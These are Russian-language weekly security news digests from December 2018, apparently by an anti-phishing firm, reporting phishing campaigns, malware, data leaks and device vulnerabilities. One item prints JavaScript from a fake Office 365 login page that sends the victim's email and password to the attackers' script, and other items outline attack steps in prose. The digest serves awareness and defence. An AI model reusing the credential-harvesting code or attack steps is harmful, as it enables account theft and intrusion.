Представляем новости об актуальных технологиях фишинга и других атаках на человека c 14 по 20 декабря 2018 года.

Андрей Жаркевич
редактор, ИТ-руководитель


Артемий Богданов
технический директор


Сергей Волдохин
выпускающий редактор

Сайты, почта и мессенджеры

Злоумышленники рассылают фальшивые уведомления от имени Office 365 о невозможности доставить сообщение.

Жертвы получают уведомление о том, что «Microsoft обнаружила несколько неотправленных писем»:

В уведомлении есть ссылка «Отправить еще раз» якобы для повторной отправки «неотправленных» писем. После нажатия на ссылку жертва оказывается на поддельной странице авторизации Office 365:

URL-адрес фишинговой страницы отличается от настоящего и должен вызывать опасения, но большинство пользователей, увидев знакомый экран и HTTPS, не обращают внимания на адресную строку.

Когда пользователь вводит в форму для авторизации свой пароль, фишинговый сайт проверяет его на настоящей странице авторизации Office 365 и, если пароль введен успешно, переадресует пользователя туда.

Фрагмент кода при отправке формы на фишинговом сайте:

function sendmails() {
  var em = $('#testx').val();
  var ps = $('#pass').val();
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      var response = JSON.parse(this.responseText);
      if (response.msg == "donesend") {
        $(".login_form").hide(); 
        $(".thanks").show(); setTimeout("window.location.href='https://outlook.office365.com/owa/?realm';",5000);
      } else {
        $("#warning").empty();
        $('#warning').append('Your email or password is incorrect. If you don\'t remember your password,<a href="#"> reset it now.<a/>');
      }
    }
  };
  xhttp.open("GET", "sendx.php?user=" + em + "&pass=" +ps, true);
  xhttp.send();
}

Обнаружена масштабная кампания по краже Apple ID и других данных владельцев устройств Apple.

Мошенники рассылают письма, замаскированные под подтверждение заказа, якобы недавно оформленного получателем в App Store:

К поддельному сообщению прикреплен PDF-файл с детализированным счетом, который содержит квитанцию с номером заказа и суммой платежа в размере $30, а также несколько ссылок, по которым покупатель может заявить о проблеме или ошибке:

URL ссылок сгенерированы на сервисе-сокращателе, чтобы получатель письма не понял, куда они ведут на самом деле.

При переходе по ссылке пользователь попадает на фальшивый портал управления учетными записями Apple. Там его просят авторизоваться с помощью Apple ID, а после ввода переадресуют на страницу, сообщающую о блокировке аккаунта в связи с возможным нарушением безопасности.

Для разблокировки нужно нажать соответствующую кнопку.

После нажатия кнопки пользователь окажется на странице, запрашивающей информацию учетной записи Apple ID: полное имя, адрес, номер телефона, номер страховки, дату рождения, платежные данные и ответы на секретные вопросы, в том числе девичью фамилию матери и номер водительских прав или паспорта:

После заполнения фальшивой формы демонстрируется страница ожидания — якобы для завершения выхода из аккаунта, необходимого для восстановления доступа:

Затем жертву перенаправляют на легитимную страницу портала appleid.apple.com:

Сайт Apple реагирует на редирект сообщением «Время сессии истекло, пожалуйста, пройдите авторизацию заново», которое лишь укрепляет иллюзию нормального процесса восстановления доступа к учетной записи.

Введенных в фишинговые формы данных достаточно, чтобы осуществить кражу личности, в том числе от имени жертвы открыть кредитный счет в банке, получить доступ к другим аккаунтам или заполнить налоговые декларации.

Вредоносное ПО

Новые вредоносные программы атакуют пользователей macOS.

Первая распространяется через макросы в документах Microsoft Office:

Вторая атакует пользователей macOS, маскируясь под приложение-мессенджер Discord:

1. Загрузчик LamePyre представляет собой скрипт на Automator, который распаковывает и выполняет три скрипта на Python
2. Первый скрипт — клиент бэкдора EmPyre, второй — создаёт скриншоты и отправляет злоумышленникам, третий — добавляет запуск вредоноса в автозагрузку.
3. Вредонос не скрывает своего присутствия в системе и даже не пытается установить легитимную версию программы, а спокойно отображается в статус-меню:

Обнаружен вредонос, который использует для получения команд от операторов Twitter-мемы.

1. Мемы публикуются в специальном аккаунте Twitter в виде обычных картинок
2. Вредонос постоянно «читает» публикации этого аккаунта.
3. Обнаружив опубликованную картинку, вредонос читает её метаданные.
4. Если в них присутствует команда, он выполняет её.

Например, по команде /print вредонос снимает скриншот экрана заражённого компьютера и отправляет злоумышленникам.

Атаки, уязвимости и утечки

В программе Options для настройки периферийных устройств Logitech обнаружена уязвимость, позволяющая удалённо инициировать нажатия клавиш на клавиатуре.

При запуске приложение запускает сервер WebSocket, который поддерживает отправку команд, запускается автоматически при загрузке ОС и имеет слабую систему аутентификации: для её прохождения достаточно было предоставить ID запущенного пользователем процесса (PID), причём количество попыток входа не ограничивалось.

Из-за взлома сайта Министерства Европы и иностранных дел Франции личные данные 540 тысяч человек оказались в руках злоумышленников.

Похищенная база содержит имена, телефонные номера и электронные адреса пользователей, зарегистрировавшихся в сервисе Ariane. Сервис позволяет людям, планирующим поездку за границу, зарегистрироваться для получения информации о безопасности.

По сообщению ведомства, данные могут быть использованы для вредоносной деятельности, но не представляют опасности с точки зрения хищения денежных средств, поскольку не содержат платёжной информации.

Сторонние разработчики могли получить доступ к личным фотографиям порядка 6,8 млн пользователей из-за ошибки в программном интерфейсе Facebook Photo API.

Из-за некорректно написанного кода разработчики могли получить доступ не только к фотографиям, размещённым в ленте, как указано в документации, но и к другим фотографиям, включая даже неопубликованные.

По данным исследователей, доступ к фотографиям получили около полутора тысяч приложений.

Из-за ошибки в API Twitter не авторизованные сервисом приложения могли получить доступ к личным сообщениям пользователя.

При этом уведомление о предоставленных разрешениях, отображаемое в таких случаях, не содержало информации о расширенных привилегиях:

Эксперт, обнаруживший ошибку, выяснил, что после утечки открытых и секретных ключей Twitter API сервис изменил алгоритм авторизации приложений, чтобы исключить несанкционированные подключения.

Оказалось, что используя авторизацию по PIN-коду, эту систему защиты можно обойти: злоумышленники могут запросить у пользователя доступ к его личным сообщениям через приложение, не авторизованное Twitter. При этом в окне логина будет указано, что оно таких прав не получает.

В домашних зарядных станциях для электромобилей обнаружены уязвимости, через которые киберпреступники могут взломать устройство, отключить питание электромобиля и даже вызвать возгорание.

Чтобы провести атаку, злоумышленник может:

1. Зарегистрировать нового пользователя в приложении ChargePointHome, с помощью которого можно управлять зарядкой. Чтобы сделать это без ведома настоящего владельца, преступник может внедрить код JTAG в процедуру верификации пароля и успешно пройти аутентификацию с любым паролем.
2. Подключить устройство к смартфону по Bluetooth
3. Настроить параметры Wi-Fi
4. Завершить процесс регистрации, отправив ID нового пользователя и GPS-координаты смартфона конечному устройству.

После этого атакующий может в любой момент вмешиваться в процесс зарядки.

Кроме уязвимости в приложении зарядные станции имеют встроенный веб-сервер с включенным интерфейсом CGI, также содержащим ряд ошибок, которые позволяют управлять процессом зарядки через беспроводное подключение к домашней сети. Эксперты считают, что таким образом злоумышленник может увеличить ток зарядки и вызвать возгорание от перегрева.

Умные устройства (и животные)

Говорящий попугай научился использовать умную колонку Amazon Alexa для заказа товаров.

1. Сотрудница Национального фонда защиты животных Великобритании из жалости забрала домой говорящего попугая жако, который ругался матом и швырял свою поилку.
2. Общаясь с умной колонкой Alexa, попугай научился включать романтические песни, а потом стал делать различные покупки: заказывал домой клубнику, изюм, дыню, брокколи и мороженое, а потом заказал чайник, лампочки и воздушного змея.
3. Alexa не смогла отличить заказы попугая от заказов, сделанных человеком, поэтому хозяйке пришлось включить родительский контроль и каждый вечер отменять покупки, которые пытался сделать домашний питомец.

Телеграм-канал Антифишинга

Анонсы дайджестов, наши исследования по психологии в безопасности, новости про фишинг и прочие цифровые атаки на людей.

Материалы, которые помогут вам, вашим коллегам и близким оставаться в безопасности.

Представляем новости об актуальных технологиях фишинга и других атаках на человека c 7 по 13 декабря 2018 года.

Андрей Жаркевич
редактор, ИТ-руководитель


Артемий Богданов
технический директор


Сергей Волдохин
выпускающий редактор

Мобильная безопасность

Из каталога Google Play удалили 22 вредоносных приложения, которые занимались скликиванием рекламы в фоновом режиме.

1. Приложения маскировались под игры, фонарики и различные полезные утилиты.
2. Вредоносы добавляли себя в автозагрузку, а если пользователь завершал их работу, через три минуты снова запускались
3. Рекламный контент открывался в невидимом окне браузера размером 0х0 пикселей.
4. Вредоносы редактировали данные User-Agent, представляясь пользователями iOS, поскольку рекламодатели больше платят за их клики, считая более платёжеспособными.

Новый троян для Android маскируется под приложение для оптимизации батареи и похищает деньги с аккаунтов PayPal.

1. Во время установки вредонос запрашивает права на использование специальных возможностей, чтобы автоматически имитировать нажатия и другие действия пользователя.
2. Троян ждёт, когда пользователь запустит официальное приложение PayPal и войдёт в него.
3. Троян активизируется и имитирует нажатия пользователя с помощью специальных возможностей, создавая новый перевод денег на свой счёт.
4. Процесс занимает не более пяти секунд, так что пользователь не имеет шансов помешать происходящему:

Атака PowerSnitch позволяет взломать смартфон и скопировать с него данные, анализируя ток, потребляемый устройством во время зарядки от внешнего аккумулятора.

1. Во внешний аккумулятор встраивается специальный декодер, который может преобразовывать электрические сигналы в двоичный код через GNURadio — программный инструмент с открытым кодом для разработки программно определяемого радио (SDR).
2. На смартфоне злоумышленник должен установить специальное вредоносное приложение, которое может включать и выключать экран, либо загружать процессор энергоёмкими вычислениями, вызывая всплески энергопотребления.
3. Декодер во внешнем аккумуляторе анализирует эти всплески и формирует из них поток байтов, позволяя передать похищенную из устройства конфиденциальную информацию.
4. Скорость передачи информации составляет около 2 байт в секунду.
5. Избежать атаки можно только выключив телефон во время зарядки.

Сайты, почта и мессенджеры

Злоумышленники используют для распространения вредоносного ПО сексуальный шантаж.

1. Жертва получает письмо.
2. В письме утверждается, что в распоряжении злоумышленников имеется видеозапись того, как жертва посещала порносайты, либо что у преступников имеются свидетельства хранения на компьютере нелегальной порнографии.
3. Для убедительности в письме могут быть пароли жертвы, полученные из различных утечек прошлых лет.
4. Жертве предлагается заплатить выкуп в биткоинах или другой криптовалюте.
5. К письму прикладывается ссылка на ZIP-архив, в котором якобы содержится компромат на пользователя.
6. В архиве содержится вредонос AZORult, который крадёт с компьютера пользователя аккаунты, куки, логи, а затем заражает его шифровальщиком GandCrab.

Злоумышленники используют события Facebook и публикации в Группах Google для распространения вредоносного контента.

В Facebook создаётся учётная запись пользователя. От имени этой учётной записи создаются сотни различных событий. В описании событий указаны ссылки якобы на пиратские игры и программы:

Ссылки ведут на сайты со сгенерированным пользователями контентом, где под видом краков на игры пользователь загрузит архив с вредоносным ПО.

Вредоносное ПО

Киберпреступники атакуют маршрутизаторы с помощью нового набора эксплойтов Novidade.

Распространение эксплойтов происходит через вредоносную рекламу, скомпрометированные сайты и мессенджеры:

Эксплуатируя уязвимость CSRF, Novidade изменяет настройки DNS атакованных маршрутизаторов, перенаправляя трафик на IP-адрес, контролируемый злоумышленниками.

Вредонос DarthMiner для macOS изображает из себя взломщика для программ Adobe, но вместо взлома устанавливает на компьютер майнер криптовалюты.

1. DarthMiner попадает на компьютер под видом пиратской утилиты Adobe Zii.
2. Получив управление, вредонос загружает и запускает обфусцированный скрипт на Python и одну из версий Adobe Zii.
3. Скрипт ищет на компьютере брандмауэр Little Snitch, а обнаружив, завершает его.
4. Скрипт соединяется с управляющим сервером бэкдора EmPyre, добавляется в автозагрузку и устанавливает на компьютер майнер XMRig.

Атаки, уязвимости и утечки

Обнаружена база данных MongoDB, которая содержит сведения о более чем 66 млн пользователей LinkedIn.

Любой желающий мог получить доступ к имени, электронной почте, телефону, адресу, спискам профессиональных навыков и мест работы, а в некоторых случаях — и к IP-адресу человека.

Хотя база была собрана из открытых данных и не содержит паролей и номеров банковских карт, информация из неё может быть использована для проведения фишинговых и целевых атак.

Из-за ошибки в Google+ People API личные данные 52,5 млн человек были доступны для кого угодно.

Ошибка присутствовала в коде соцсети всего 6 дней и давала приложениям, разработанным с использованием API, доступ к любой информации в профилях пользователей, включая непубличные профили.

В числе сведений — имя, е-мейл, возраст, дата рождения, род занятий и многое другое. Пароли и номера банковских карт в список сведений для утечки не попали.

Телеграм-канал Антифишинга

Анонсы дайджестов, наши исследования по психологии в безопасности, новости про фишинг и прочие цифровые атаки на людей.

Материалы, которые помогут вам, вашим коллегам и близким оставаться в безопасности.

Представляем новости об актуальных технологиях фишинга и других атаках на человека c 30 ноября по 6 декабря 2018 года.

Андрей Жаркевич
редактор, ИТ-руководитель


Артемий Богданов
технический директор


Сергей Волдохин
выпускающий редактор

Сайты, почта и мессенджеры

Злоумышленники из группировки APT28 использовали для распространения вредоносного ПО фишинговые письма с новостями о Brexit.

1. Письма содержали вредоносный документ MS Word с именем «Brexit 15.11.2018.docx». 15.11.2018 — дата публикация Еврокомиссией текста окончательного проекта выхода Великобритании из Евросоюза.
2. При открытии документа пользователю предлагается отключить защищенный режим и активировать макросы.
3. Если выполнить это действие, в систему установится бэкдор Zekapab.
4. Zekapab собирает информацию о системе и списке запущенных процессов, после чего отправляет эти сведения на управляющий сервер, который в ответ направляет вредоносную программу для дальнейших действий.

Мобильная безопасность и телефонное мошенничество

Нечестные разработчики используют TouchID на устройствах Apple, чтобы обманом заставить жертву совершить покупку внутри приложения.

1. При первом запуске такие приложения просят своих жертв приложить палец к сканеру TouchID якобы для завершения настройки.
2. Предоставив приложению свой отпечаток, пользователь подтверждал платеж через TouchID в размере 99.99, 119.99 или 139.99 долларов США.
3. Если пользователь отказывался, приложение попросту не запускалось.
4. Для проведения платежа у пользователя должна быть банковская карта с достаточным количеством средств, привязанная к AppStore.

Scam iOS apps has been found on Apple App Store tricking users to pay over $100

Apps ask for fingerprint right at the moment when paying pop-up shows, which is accepted by user fingerprint.https://t.co/7WwT6bhsLF pic.twitter.com/BYZvd7p0VD

— Lukas Stefanko (@LukasStefanko) 3 декабря 2018 г.

Мошенники по телефону выманивают деньги у пожилых жителей США, притворяясь их родственниками или близкими, попавшими в беду.

1. Злоумышленники собирают информацию о потенциальной жертве в социальных сетях и других источниках.
2. Как правило, мошенники просят деньги на внесение залога или решение проблем с законом. Другой вариант — аварии, в которых мнимый родственник оказался виновником, например, из-за вождения в нетрезвом виде или использования телефона за рулем.
3. Злоумышленники играют на эмоциях, утверждая, что им больше некому позвонить, кроме как любимой бабушке или дедушке.
4. Чтобы скрыть разницу в голосе, они придумывают легенду о сломанном носе или разговаривают сквозь непрекращающиеся рыдания.
5. Чтобы затруднить поимку, преступники настаивают на наличных, предлагая разложить банкноты по нескольким конвертам, спрятать их между страниц журналов и отправить курьерской службой или обычной почтой.

За последние 12 месяцев ущерб от подобного мошенничества вырос более чем в полтора раза, достигнув 41 млн долларов США.

Атаки и утечки

Для атак против европейских банков злоумышленники использовали устройства, подключённые к локальной сети банка.

Cтолы с розетками отлично подходят для скрытого размещения.

1. Злоумышленники под видом курьера или соискателя вакансии проникали в помещение банка и незаметно подключали устройство к сети банка в переговорной или другом оборудованном розетками месте.
2. В качестве устройства для проникновения использовался нетбук или недорогой ноутбук, одноплатный компьютер на базе Raspberry Pi, либо Bash Bunny, специальный инструмент для проведения USB-атак.
3. Для удаленного доступа к устройству использовался GPRS/3G/LTE-модем, встроенный в устройство или подключенный к нему через USB-порт.
4. Злоумышленники удаленно подключались к своему устройству и сканировали локальную сеть, пытаясь получить доступ к папкам общего доступа, веб-серверам и другим открытым ресурсам.
5. Одновременно запускался перебор и перехват данных, которые можно использовать для авторизации в сети.
6. Получив такие данные, злоумышленники авторизовались в системе и внедряли на ней ПО для удалённого доступа.
7. Чтобы обойти белые списки и доменные политики, взломщики применяли бесфайловые методици и скрипты PowerShell.

Любопытная деталь: сценарий атаки почти буквально повторяет сюжет одного из эпизодов сериала «Mr. Robot».

В результате взлома системы бронирования Starwood Hotels & Resorts преступники похитили персональные данные 500 млн клиентов гостиниц группы Marriott International Inc.

Похищенная информация содержит ФИО, телефоны, паспортные данные, адреса электронной почты, почтовые адреса, даты рождения, а также номера банковских карт и сведения о сроках истечения их действия. Как отмечается в пресс-релизе Mariott, номера банковских карт хранились в зашифрованном виде, но не исключено, что преступники смогли расшифровать данные.

Неизвестные злоумышленники смогли получить доступ к серверам проекта Quora и похитить личную информацию примерно 100 млн человек.

Установлено, что злоумышленники получили доступ:

• к информации об аккаунтах, включая имена, email-адреса, зашифрованные пароли;
• данным о публичных действиях и контенте, то есть к вопросам, ответам, комментариям и положительным оценкам пользователей;
• данным о непубличных действиях и контенте: личным сообщениям, запросам ответов, отрицательным оценкам.

Всех пострадавших пользователей уже разлогинили на сайте Quora, а во время следующего входа будет произведена смена пароля. Также компания начала рассылать уведомления всем, кого мог затронуть данный инцидент.

Умные устройства

Фанат популярного блогера PewDiePie взломал 50 тысяч принтеров и распечатал на них листовки с рекламой канала своего кумира.

Для атаки злоумышленник воспользовался инструментом Printer Exploitation Toolkit, который эксплуатирует уязвимости в 20 популярных моделях принтеров. Сама атака состоит в отправке на принтер с открытыми портами IPP, LPD и 9100 сообщения для печати.

Взломщик подчеркнул, что никогда прежде не занимался ничем подобным, но все приготовления и сама атака заняли у него лишь полчаса. Также он отметил, что мог бы скомпрометировать более 800 тыс. устройств, но ограничился меньшим количеством.

Легкость использования уязвимых принтеров вдохновила создателей сервиса Printer-Spam-as-a-Service/Printer Advertising, которые предлагают услуги по рассылке спама на печатающие устройства всего мира.

Операторы сервиса заявляют, что могут добраться до любого принтера в мире, сканируют интернет в поисках уязвимых устройств и распечатывают на них рекламу своего сервиса. Журналистам ZDNet они сообщили, что используют собственную разработку на языке Go, поскольку инструмент Printer Exploitation Toolkit работает слишком медленно.

Электромобили Tesla, Volkswagen, Mitsubishi, BMW, Ford и другие, проданные в Китае, передают трекинговые данные в мониторинговые центры, связанные с властями страны.

Мониторинговый центр в Шанхае. Фото — AP/Ng Han Guan

Китайские чиновники заявляют, что информация собирается для обеспечения общественной безопасности и противодействия мошенничеству, однако количество собираемых сведений противоречит их словам.

В соответствии с принятыми в Китае нормами, электромобили должны отправлять данные своим производителям, а те переправлять их в мониторинговые центры, расположенные в Пекине и Шанхае. Всего собирается более 60 различных характеристик, включая геоданные, состояние батареи и двигателя.

Вредоносное ПО, уязвимости и эксплойты

Криптовалютный вредонос KingMiner атакует системы под управлением Windows Server.

1. Для проникновения в систему исплоьзуется брутфорс-атака.
2. После попадания в систему определяется тип процессора и загружается соответствующая версия майнера XMRing.
3. Если сервер уже был инфицирован, KingMiner выгружает из памяти и удаляет все файлы, относящиеся к своим предыдущим версиям, а затем повторно заражает компьютер.
4. В коде майнера содержится ошибка, из-за которой он полностью загружает процессор инфицированного сервера.

Cache Attacks (CAT) — новый тип атаки по сторонним каналам, позволяющий понизить версии большинства текущих реализаций TLS и перехватить закрытые ключи шифрования.

Метод представляет собой модификацию первой практической атаки на RSA (Padding Oracle attack), предложенной Даниэлем Блейхенбахером (Daniel Bleichenbacher), при которой параллельно выполнятся несколько атак Padding Oracle. Это позволяет злоумышленнику похитить токен аутентификации для доступа к учётной записи пользователя и перехватить контроль над аккаунтом.

Для атаки уязвимы библиотеки OpenSSL, Amazon s2n, MbedTLS, Apple CoreTLS, Mozilla NSS, WolfSSL, GnuTLS и любое ПО, использующее их.

SplitSpectre — новый вариант уязвимости Spectre, который можно использовать через браузер.

По данным специалистов, использовать SplitSpectre значительно проще, чем выполнить оригинальную атаку Spectre. Уязвимость успешно протестирована на процессорах Intel Haswell, Skylake и AMD Ryzen с использованием JavaScript-движка SpiderMonkey 52.7.4.

Телеграм-канал Антифишинга

Анонсы дайджестов, наши исследования по психологии в безопасности, новости про фишинг и прочие цифровые атаки на людей.

Материалы, которые помогут вам, вашим коллегам и близким оставаться в безопасности.